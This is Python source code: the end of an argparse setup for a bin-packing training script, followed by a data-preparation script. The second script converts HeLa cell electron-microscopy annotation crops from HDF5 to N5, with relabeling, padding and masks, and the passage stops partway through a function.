parser.add_argument('--initial_container_height', default=250, type=int)
# Packing settings
parser.add_argument('--packing_strategy', default='LB_GREEDY', type=str)
parser.add_argument('--reward_type', default='C+P+S-lb-soft', type=str)
# Network settings
# ---- TODO: network reward
parser.add_argument('--input_type', default='bot', type=str)
parser.add_argument('--allow_rot', default=True, type=str2bool)
parser.add_argument('--decoder_input_type', default='shape_heightmap', type=str) # shape_heightmap, shape_only, heightmap_only
parser.add_argument('--heightmap_type', default='diff', type=str) # full, zero, diff
# Network parameters
parser.add_argument('--dropout', default=0.1, type=float)
parser.add_argument('--actor_lr', default=5e-4, type=float)
parser.add_argument('--critic_lr', default=5e-4, type=float)
parser.add_argument('--max_grad_norm', default=2., type=float)
parser.add_argument('--n_process_blocks', default=3, type=int)
parser.add_argument('--layers', dest='num_layers', default=1, type=int)
parser.add_argument('--encoder_hidden', dest='encoder_hidden_size', default=128, type=int)
parser.add_argument('--decoder_hidden', dest='decoder_hidden_size', default=256, type=int)
# ROLLING
parser.add_argument('--total_blocks_num', default=20, type=int)
# parser.add_argument('--use_all_gt', default=False, type=str2bool)
# parser.add_argument('--use_heightmap', default=True, type=str2bool)
# parser.add_argument('--only_heightmap', default=False, type=str2bool)
# parser.add_argument('--test', action='store_true', default=False)
args = parser.parse_args()
if args.cpu_threads != 0:
torch.set_num_threads(args.cpu_threads)
if args.task == 'pack':
print('Reward type: %s' % args.reward_type)
print('Input type: %s' % args.input_type)
print('Mix data: %s' % args.mix_data)
print('Gt data: %s' % args.gt_data)
print('Decoder input: %s' % args.decoder_input_type)
print('Heightmap_type: %s' % args.heightmap_type)
print('Target container: %s' % args.container_width)
print('Init container: %s' % args.initial_container_width)
print('Unit: %s' % args.unit)
print('Packing strategy: %s' % args.packing_strategy)
print('note: %s' % args.note)
os.environ["CUDA_VISIBLE_DEVICES"] = args.cuda
train_pack(args)
else:
raise ValueError('Task <%s> not understood'%args.task)
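# Example invocation (illustrative only; the filename `rolling_pack.py` and the checkpoint path are
# placeholders, the flags are the ones defined by the argparse block above):
#   python rolling_pack.py --task pack --obj_dim 2 --nodes 10 --total_blocks_num 20 \
#       --decoder_input_type shape_heightmap --heightmap_type diff --use_cuda false \
#       --checkpoint path/to/saved/model_dir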
|
from __future__ import print_function
import z5py
import h5py
import numpy as np
import collections
import datetime
import logging
def add_ds(target, name, data, chunks, resolution, offset, **kwargs):
if name not in target:
logging.info("Writing dataset {0:} to {1:}".format(name, target.path))
ds = target.create_dataset(
name,
shape=data.shape,
chunks=chunks,
dtype=data.dtype,
compression="gzip",
type="gzip",
level=6,
)
target[name].attrs["resolution"] = resolution
target[name].attrs["offset"] = offset
target[name][:] = np.array(data)
for k in kwargs:
target[name].attrs[k] = kwargs[k]
else:
logging.info(
"Dataset {0:} already exists in {1:}, not overwriting".format(
name, target.path
)
)
ds = target[name]
return ds
def add_subset_label_ds(target, labels, name, label_ids, chunks, resolution):
if not isinstance(label_ids, collections.Iterable):
label_ids = (label_ids,)
add_ds(
target,
name,
np.logical_or.reduce([labels == lid for lid in label_ids]).astype(labels.dtype),
chunks,
resolution,
[0.0, 0.0, 0.0],
)
def contrast_adaptation(raw, min_ad, max_ad):
scale = 255.0 / (float(max_ad) - float(min_ad))
shift = -scale * float(min_ad)
return (raw * scale + shift).round().astype(np.uint8)
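# Worked example (values used by the crop functions below): with min_ad=70 and max_ad=204,
# scale = 255 / (204 - 70) ≈ 1.903 and shift = -70 * scale ≈ -133.2, so a raw intensity of 70 maps
# to 0 and 204 maps to 255. Note that the uint8 cast does not clip, so inputs are assumed to stay
# within [min_ad, max_ad].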
def main(
orig,
target,
mapping,
ribos=True,
src_label_name="volumes/labels/gt",
ribo_orig=None,
):
raw = orig["volumes/raw"]
if ribo_orig is None:
ribo_orig = orig
labels = orig[src_label_name]
if ribos:
ribosomes = ribo_orig["volumes/labels/ribosomes"]
if "volumes" not in target.keys():
target.create_group("volumes")
logging.info(
"RAW dataset {0:} has resolution {1:} and offset {2:}".format(
raw.shape, raw.attrs["resolution"], raw.attrs["offset"]
)
)
logging.info(
"LABELS dataset {0:} has resolution {1:} and offset {2:}".format(
labels.shape, labels.attrs["resolution"], labels.attrs["offset"]
)
)
if ribos:
logging.info(
"RIBOSOMES dataset {0:} has resolution {1:} and offset {2:}".format(
ribosomes.shape,
ribosomes.attrs["resolution"],
ribosomes.attrs["offset"],
)
)
cont = np.unique(labels)
hist = np.histogram(labels, bins=list(cont) + [cont[-1] + 0.1])
logging.info("LABELS contains ids {0:} in freq {1:}".format(cont, hist[0]))
if ribos:
cont_ribo = np.unique(ribosomes)
hist_ribo = np.histogram(
ribosomes, bins=list(cont_ribo) + [cont_ribo[-1] + 0.1]
)
logging.info(
"RIBOSOMES contains ids {0:} in freq {1:}".format(cont_ribo, hist_ribo[0])
)
logging.info("Doubling resolution of RAW (using nearest neighbor)")
raw_up = np.repeat(np.repeat(np.repeat(raw, 2, axis=0), 2, axis=1), 2, axis=2)
logging.info("saving upscaled RAW to {0:}".format(target.path))
add_ds(
target,
"volumes/orig_raw",
raw,
raw.chunks,
list(raw.attrs["resolution"]),
list(raw.attrs["offset"]),
)
add_ds(
target,
"volumes/raw",
raw_up,
raw.chunks,
[float(r) / 2.0 for r in raw.attrs["resolution"]],
list(raw.attrs["offset"]),
)
padding_before = (
(
(
np.array(labels.attrs["offset"])
- np.array(labels.attrs["resolution"]) / 2.0
)
+ np.array(raw.attrs["resolution"] / 2.0)
)
/ np.array(labels.attrs["resolution"])
).astype(np.int)
padding_after = (
np.array(target["volumes/raw"].shape) - padding_before - np.array(labels.shape)
).astype(np.int)
padding = tuple((b, a) for b, a in zip(padding_before, padding_after))
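    # `padding` holds one (before, after) margin pair per axis, positioning the label volume inside
    # the upscaled raw grid.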
bg_label = 18446744073709551613
logging.info(
"padding LABELS with {0:} to match shape of upscaled RAW, padding value {1:} and relabeling "
"using mapping {2:} to {3:}".format(
padding, bg_label, range(len(mapping)), mapping
)
)
# labels_padded = np.pad(labels, padding, 'constant', constant_values=bg_label)
# numpy.pad has a bug when handling uint64, it is fixed in the current master so should be good with the next
# numpy release (currently 1.14.3)
    labels_padded = np.ones(tuple(rs * 2 for rs in raw.shape), dtype=np.uint64) * bg_label
labels_padded[
padding[0][0] : -padding[0][1],
padding[1][0] : -padding[1][1],
padding[2][0] : -padding[2][1],
] = mapping[np.array(labels)]
cont_relabeled = np.unique(labels_padded)
hist_relabeled = np.histogram(
labels_padded, bins=list(cont_relabeled) + [cont_relabeled[-1] + 0.1]
)
logging.info(
"padded LABELS contains ids {0:} in freq {1:}".format(
cont_relabeled, hist_relabeled[0]
)
)
assert raw_up.shape == labels_padded.shape
if ribos:
ribosomes_padded = np.ones(labels_padded.shape, dtype=np.uint64) * bg_label
ribosomes_padded[
padding[0][0] : -padding[0][1],
padding[1][0] : -padding[1][1],
padding[2][0] : -padding[2][1],
] = np.array(ribosomes)
ribosomes_mask_padded = np.zeros(labels_padded.shape, dtype=np.uint64)
ribosomes_mask_padded[
padding[0][0] : -padding[0][1],
padding[1][0] : -padding[1][1],
padding[2][0] : -padding[2][1],
] = np.ones(ribosomes.shape)
cont_ribo_relabeled = np.unique(ribosomes_padded)
hist_ribo_relabeled = np.histogram(
ribosomes_padded,
bins=list(cont_ribo_relabeled) + [cont_ribo_relabeled[-1] + 0.1],
)
else:
ribosomes_mask_padded = np.zeros(labels_padded.shape, dtype=np.uint64)
if "labels" not in target["volumes"]:
target["volumes"].create_group("labels")
add_ds(
target,
"volumes/labels/all",
labels_padded,
labels.chunks,
list(labels.attrs["resolution"]),
[0.0, 0.0, 0.0],
orig_ids=list(hist[1]),
orig_counts=list(hist[0]),
relabeled_ids=list(hist_relabeled[1]),
relabeled_counts=list(hist_relabeled[0]),
mapping=list(mapping),
)
add_ds(
target,
"volumes/mask",
(labels_padded != bg_label).astype(labels.dtype),
labels.chunks,
list(labels.attrs["resolution"]),
[0.0, 0.0, 0.0],
)
del labels_padded
if ribos:
add_ds(
target,
"volumes/labels/ribosomes",
ribosomes_padded,
ribosomes.chunks,
list(ribosomes.attrs["resolution"]),
[0.0, 0.0, 0.0],
orig_ids=list(hist_ribo[1]),
orig_counts=list(hist_ribo[0]),
relabeled_ids=list(hist_ribo_relabeled[1]),
            relabeled_counts=list(hist_ribo_relabeled[0]),
)
add_ds(
target,
"volumes/ribosomes_mask",
ribosomes_mask_padded,
labels.chunks,
list(labels.attrs["resolution"]),
[0.0, 0.0, 0.0],
)
# add_subset_label_ds(target, labels_padded, 'volumes/labels/ECS', (6, 7),
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/cell', (1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 13, 14),
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/plasma_membrane', 5,
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/ERES', (12, 13),
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/ERES_membrane', 12,
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/mvb', (3, 9),
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/mvb_membrane', 3,
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/er', (4, 8),
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/er_membrane', 4,
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/mito', (1, 2),
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/mito_membrane', 2,
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/vesicles', 10,
# labels.chunks, list(labels.attrs['resolution']))
# add_subset_label_ds(target, labels_padded, 'volumes/labels/microtubules', 11,
# labels.chunks, list(labels.attrs['resolution']))
orig.close()
def main_multiscale(
orig,
target,
labelnames,
mapping,
min_ad,
max_ad,
src_label_name="volumes/labels/gt",
specified_masks=None,
separate_datasets=None,
):
if specified_masks is None:
specified_masks = dict()
if separate_datasets is None:
separate_datasets = dict()
if "volumes" not in target.keys():
target.create_group("volumes")
if "labels" not in target["volumes"]:
target["volumes"].create_group("labels")
if "masks" not in target["volumes"]:
target["volumes"].create_group("masks")
# raw dataset
raw = orig["volumes/raw"]
logging.info(
"RAW dataset {0:} has resolution {1:} and offset {2:}".format(
raw.shape, raw.attrs["resolution"], raw.attrs["offset"]
)
)
add_ds(
target,
"volumes/raw",
contrast_adaptation(np.array(raw), min_ad, max_ad),
raw.chunks,
list(raw.attrs["resolution"]),
[0.0, 0.0, 0.0],
)
# generic labels
labels = orig[src_label_name]
logging.info(
"LABELS dataset {0:} has resolution {1:} and offset {2:}".format(
labels.shape, labels.attrs["resolution"], labels.attrs["offset"]
)
)
cont = np.unique(labels)
hist = np.histogram(labels, bins=list(cont) + [cont[-1] + 0.1])
logging.info("LABELS contains ids {0:} in freq {1:}".format(cont, hist[0]))
# compute padding
padding_before = (
(
(
np.array(labels.attrs["offset"])
- np.array(labels.attrs["resolution"]) / 2.0
)
+ np.array(raw.attrs["resolution"] / 2.0)
)
/ np.array(labels.attrs["resolution"])
).astype(np.int)
padding_after = (
2 * np.array(raw.shape) - padding_before - np.array(labels.shape)
).astype(np.int)
padding = tuple((b, a) for b, a in zip(padding_before, padding_after))
bg_label = 18446744073709551613
logging.info(
"padding LABELS with {0:} to match shape of upscaled RAW, padding value {1:} and relabeling "
"using mapping {2:} to {3:}".format(
padding, bg_label, range(len(mapping)), mapping
)
)
# labels_padded = np.pad(labels, padding, 'constant', constant_values=bg_label)
# numpy.pad has a bug when handling uint64, it is fixed in the current master so should be good with the next
# numpy release (currently 1.14.3)
labels_padded = (
np.ones(tuple([rs * 2 for rs in raw.shape]), dtype=np.uint64) * bg_label
)
labels_padded[
padding[0][0] : -padding[0][1],
padding[1][0] : -padding[1][1],
padding[2][0] : -padding[2][1],
] = mapping[np.array(labels)]
cont_relabeled = np.unique(labels_padded)
hist_relabeled = np.histogram(
labels_padded, bins=list(cont_relabeled) + [cont_relabeled[-1] + 0.1]
)
logging.info(
"padded LABELS contains ids {0:} in freq {1:}".format(
cont_relabeled, hist_relabeled[0]
)
)
add_ds(
target,
"volumes/labels/all",
labels_padded,
labels.chunks,
list(labels.attrs["resolution"]),
[0.0, 0.0, 0.0],
orig_ids=list(hist[1]),
orig_counts=list(hist[0]),
relabeled_ids=list(hist_relabeled[1]),
relabeled_counts=list(hist_relabeled[0]),
mapping=list(mapping),
)
for l in labelnames:
if l in separate_datasets.keys():
label_orig = separate_datasets[l]
label_data = label_orig["volumes/labels/" + l]
logging.info(
"{0:} dataset {1:} has resolution {2:} and offset {3:}".format(
l.upper(),
label_data.shape,
label_data.attrs["resolution"],
label_data.attrs["offset"],
)
)
cont_label = np.unique(label_data)
hist_label = np.histogram(
label_data, bins=list(cont_label) + [cont_label[-1] + 0.1]
)
label_data_padded = np.ones(labels_padded.shape, dtype=np.uint64) * bg_label
label_data_padded[
padding[0][0] : -padding[0][1],
padding[1][0] : -padding[1][1],
padding[2][0] : -padding[2][1],
] = np.array(label_data)
cont_label_relabeled = np.unique(label_data_padded)
hist_label_relabeled = np.histogram(
label_data_padded,
                bins=list(cont_label_relabeled) + [cont_label_relabeled[-1] + 0.1],
)
add_ds(
target,
"volumes/labels/" + l,
label_data_padded,
label_data.chunks,
list(label_data.attrs["resolution"]),
[0.0, 0.0, 0.0],
orig_ids=list(hist_label[1]),
orig_counts=list(hist_label[0]),
relabeled_ids=list(hist_label_relabeled[1]),
relabeled_counts=list(hist_label_relabeled[0]),
)
# masks
mask = ((labels_padded != bg_label)[::2, ::2, ::2]).astype(np.uint64)
add_ds(
target,
"volumes/masks/training",
mask,
labels.chunks,
list(raw.attrs["resolution"]),
[0.0, 0.0, 0.0],
)
for l in labelnames:
if l not in specified_masks.keys():
add_ds(
target,
"volumes/masks/" + l,
mask,
labels.chunks,
list(raw.attrs["resolution"]),
[0.0, 0.0, 0.0],
)
else:
if specified_masks[l] == 0:
label_mask = np.zeros(mask.shape, dtype=np.uint64)
elif specified_masks[l] == 1:
label_mask = mask
elif isinstance(specified_masks[l], str) or isinstance(
specified_masks[l], unicode
):
assert orig[specified_masks[l]].shape == mask.shape
label_mask = np.array(orig[specified_masks[l]]) * mask
else:
raise ValueError
add_ds(
target,
"volumes/masks/" + l,
label_mask,
labels.chunks,
list(raw.attrs["resolution"]),
[0.0, 0.0, 0.0],
)
orig.close()
def main_cell2_crop1():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop1_Periphery"
"/Cell2_Crop1_1012x1012x612+6210-31+344.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop1_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
# mapping = np.array([0, 9, 8, 10, 4, 2, 1, 1, 5, 11, 12, 14, 6, 7, 3, 13])
mapping = np.array([0, 4, 3, 10, 16, 2, 1, 1, 17, 11, 8, 26, 18, 19, 29, 9])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop3():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop3_Mitos"
"/Cell2_Crop3_912x912x762+7544-56+3743.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop3.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 10, 2, 3, 8, 26, 17, 4, 11, 9, 18, 29, 1, 5, 19, 12, 13])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop6():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop6_Ribosome"
"/Cell2_Crop6_762x762x762+2764+144+2743_labels-only.h5",
"r",
)
ribo_orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop6_Ribosome"
"/Cell2_Crop6_762x762x762+2764+144+2743_ribosomes.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop6.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 17, 3, 4, 10, 11, 29, 18, 19, 26])
ribos = True
main(orig, target, mapping, ribos, ribo_orig=ribo_orig)
def main_cell2_crop7():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop7_PM"
"/Cell2_Crop7_812x812x592+8024-16-256.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop7.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array(range(972))
mapping[:11] = np.array([0, 2, 2, 1, 29, 29, 26, 8, 9, 3, 4])
mapping[971] = 2
ribos = True
srcds = "volumes/labels/merged_ids"
main(orig, target, mapping, ribos, src_label_name=srcds)
def main_cell2_crop8():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop8_ERES001"
"/Cell2_Crop8_712x712x612+3129+24+993.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop8_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
# mapping = np.array([0, 4, 6, 7, 14, 3, 5, 12, 13, 10])
mapping = np.array([0, 16, 18, 19, 26, 29, 17, 8, 9, 10])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop9():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop9_ERES002"
"/Cell2_Crop9_612x612x565+2644+164+1353.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop9_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
# mapping = np.array([0, 6, 8, 9, 3, 4, 5, 7, 10, 11, 14, 12, 13])
mapping = np.array([0, 18, 3, 4, 29, 16, 17, 19, 10, 11, 26, 8, 9])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop13():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop13_ERES006"
"/Cell2_Crop13_672x672x622+4904+504+3676.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop13_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 18, 19, 10, 11, 29, 26, 20, 21, 24, 25, 17, 8, 9])
ribos = True
main(orig, target, mapping, ribos)
def main_cell2_crop14():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop14_ERES007"
"/Cell2_Crop14_662x662x577+6074+119+4160.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop14_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
# mapping = np.array([0, 4, 7, 6, 14, 3, 5, 12, 13])
mapping = np.array([0, 16, 19, 18, 26, 29, 17, 8, 9])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop15():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop15_ERES008"
"/Cell2_Crop15_662x662x576+5874+189+4154.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop15_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
# mapping = np.array([0, 4, 5, 6, 7, 3, 14])
mapping = np.array([0, 16, 17, 18, 19, 29, 26])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop18():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations//HeLa_Cell2_Crop18_MVB"
"/Cell2_Crop18_712x712x622+1654-56+3474.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop18_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 26, 29, 16, 17, 10, 11])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop19():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/HeLa_Cell2_Crop19_BadLD"
"/Cell2_Crop19_662x662x567+6644+144+4679.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop19_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 17, 14, 15, 26, 8, 9, 29])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop20():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations//SUM159_Cell2_Crop20_LD001"
"/Cell2_Crop20_712x712x597+4449+489+5245.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop20_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 3, 4, 14, 15, 16, 17, 10, 11, 29])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop21():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations//SUM159_Cell2_Crop21_LD002"
"/Cell2_Crop21_672x672x567+4304+374+5320.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop21_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 3, 4, 16, 17, 14, 15, 29])
ribos = False
main(orig, target, mapping, ribos)
def main_cell2_crop22():
orig = h5py.File(
"/groups/hess/hess_collaborators/Annotations/BigCat Annotations/SUM159_Cell2_Crop22_LD003"
"/Cell2_Crop22_682x682x612+3754+204+5124.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/hela_cell2_crop22_{0:}.n5".format(
datetime.date.today().strftime("%m%d%y")
),
use_zarr_format=False,
)
mapping = np.array([0, 29, 16, 17, 14, 15, 10, 11, 26])
ribos = False
main(orig, target, mapping, ribos)
def main_multiscale_crop1(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop1_Periphery"
"/Cell2_Crop1_1510x1510x1170+5961-280+65.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop1.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 4, 3, 10, 16, 2, 1, 1, 17, 11, 8, 30, 18, 19, 35, 9])
# [0, mito lumen, mito membrane, MVB membrane, er membrane, plasma membrane, ECS, ECS, er lumen, MVB lumen,
# vesicle membrane, microtubules, ERES membrane, ERES lumen, cytosol, vesicle lumen]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop3(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop3_Mitos/Cell2_Crop3_1410x1410x1260"
"+7295-305"
"+3494.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop3.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 10, 2, 3, 8, 30, 17, 4, 11, 9, 18, 35, 1, 5, 19, 12, 13])
# [0, er membrane, MVB membrane, plasma membrane, mito membrane, vesicle membrane, microtubules, er lumen,
# mito lumen, MVB lumen, vesicle lumen, ERES membrane, cytosol, ECS, mito DNA, ERES lumen, lysosome membrane,
    # lysosome lumen]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop6(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop6_Ribosome"
"/Cell2_Crop6_1260x1260x1260+2515-105+2494.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop6.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([30, 16, 17, 3, 4, 10, 11, 35, 18, 19, 30])
# [0, er membrane, er lumen, mito membrane, mito lumen, MVB membrane, MVB lumen, cytosol, ERES membrane,
# ERES lumen, microtubules]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig,
target,
labels,
mapping,
min_ad,
max_ad,
specified_masks={"ribosomes": 1},
separate_datasets={"ribosomes": orig},
)
def main_multiscale_crop7(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop7_PM"
"/Cell2_Crop7_1310x1310x1170+7775-265-545.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop7.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 2, 2, 1, 35, 35, 30, 8, 9, 3, 4])
# [0, plasma membrane, plasma membrane, ECS, cytosol, cytosol, microtubules, vesicle membrane, vesicle lumen,
# mito membrane, mito lumen]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig,
target,
labels,
mapping,
min_ad,
max_ad,
specified_masks={"ribosomes": 1},
separate_datasets={"ribosomes": orig},
src_label_name="volumes/labels/merged_ids",
)
def main_multiscale_crop8(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop8_ERES001"
"/Cell2_Crop8_1210x1210x1170+2880-225+714.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop8.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 18, 19, 30, 35, 17, 8, 9, 10])
# [0, er membrane, ERES membrane, ERES lumen, microtubules, cytosol, er lumen, vesicle membrane, vesicle lumen,
# MVB membrane]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop9(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop9_ERES002"
"/Cell2_Crop9_1170x1170x1171+2365-115+1050.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop9.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 18, 3, 4, 35, 16, 17, 19, 10, 11, 30, 8, 9])
# [0, ERES membrane, mito membrane, mito lumen, cytosol, er membrane, er lumen, ERES lumen, MVB membrane,
# MVB lumen, microtubules, vesicle membrane, vesicle lumen]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop13(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop13_ERES006"
"/Cell2_Crop13_1170x1170x1170+4655+255+3402.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop13.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 18, 19, 10, 11, 35, 30, 20, 21, 36, 28, 17, 8, 9])
# [0, er membrane, ERES membrane, ERES lumen, MVB membrane, MVB lumen, cytosol, microtubules, nuclear envelope
# membrane, nuclear envelope lumen, chromatin, nucleoplasm, er lumen, vesicle membrane, vesicle lumen]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig,
target,
labels,
mapping,
min_ad,
max_ad,
specified_masks={
"ribosomes": 1,
"HChrom": 0,
"NHChrom": 0,
"EChrom": 0,
"NEChrom": 0,
},
separate_datasets={"ribosomes": orig},
)
def main_multiscale_crop14(labels, offset, datestr="020719"):
orig = h5py.File(
"/nrs/saalfeld/heinrichl/cell/Annotations020719/HeLa_Cell2_Crop14_ERES007"
"/Cell2_Crop14_1170x1170x1171+5820-135+3863.h5",
"r",
)
target = z5py.File(
"/groups/saalfeld/saalfeldlab/larissa/data/cell/multires/v{0:}_{1:}/crop14.n5".format(
datestr, offset
),
use_zarr_format=False,
)
mapping = np.array([0, 16, 19, 18, 30, 35, 17, 8, 9])
# [0, er membrane, ERES lumen, ERES membrane, microtubules, cytosol, er lumen, vesicle membrane, vesicle lumen]
min_ad = 70.0
max_ad = 204.0
main_multiscale(
orig, target, labels, mapping, min_ad, max_ad, specified_masks={"ribosomes": 0}
)
def main_multiscale_crop15(labels, offset, datestr="020719"):
orig = h5py.File(
